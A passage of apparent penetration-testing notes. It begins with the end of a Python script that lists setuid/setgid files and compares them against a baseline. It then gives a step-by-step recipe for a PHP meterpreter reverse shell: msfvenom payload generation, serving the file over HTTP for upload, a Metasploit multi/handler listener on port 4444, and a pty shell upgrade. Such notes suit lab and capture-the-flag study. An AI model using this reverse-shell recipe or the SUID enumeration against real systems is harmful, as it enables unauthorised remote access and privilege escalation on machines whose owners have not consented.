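    Covers what `find / -perm -4000` (suid) and `-perm -2000` (sgid) return
    together; note that `-perm -6000` from the notes above only matches
    files carrying BOTH bits.
    """
    found: Dict[str, str] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []  # do not descend into pseudo filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable or vanished entries are skipped
            if stat.S_ISREG(st.st_mode):
                bits = special_bits(st.st_mode)
                if bits:
                    found[path] = bits
    return found


def new_since_baseline(found: Dict[str, str], baseline: Iterable[str]) -> Set[str]:
    """Paths carrying setuid/setgid that are absent from a known-good baseline."""
    return set(found) - set(baseline)


if __name__ == "__main__":
    current = find_special("/")
    for path, bits in sorted(current.items()):
        print(f"{bits:10s} {path}")
    # In practice the baseline is the list saved at build time; constructed here.
    baseline = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"]
    for path in sorted(new_since_baseline(current, baseline)):
        print("NOT IN BASELINE:", path)
```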

Setting up a reverse shell with MSF

# Generate the shell
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.169 LPORT=4444 > msfshell.php
$ python3 -m http.server

# Upload the shell to the target host, then catch the connection with msfconsole (the payload name has no leading slash, and the listening port option is LPORT).
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.10.15.169
set LPORT 4444
run
python3 -c 'import pty; pty.spawn("/bin/bash")'
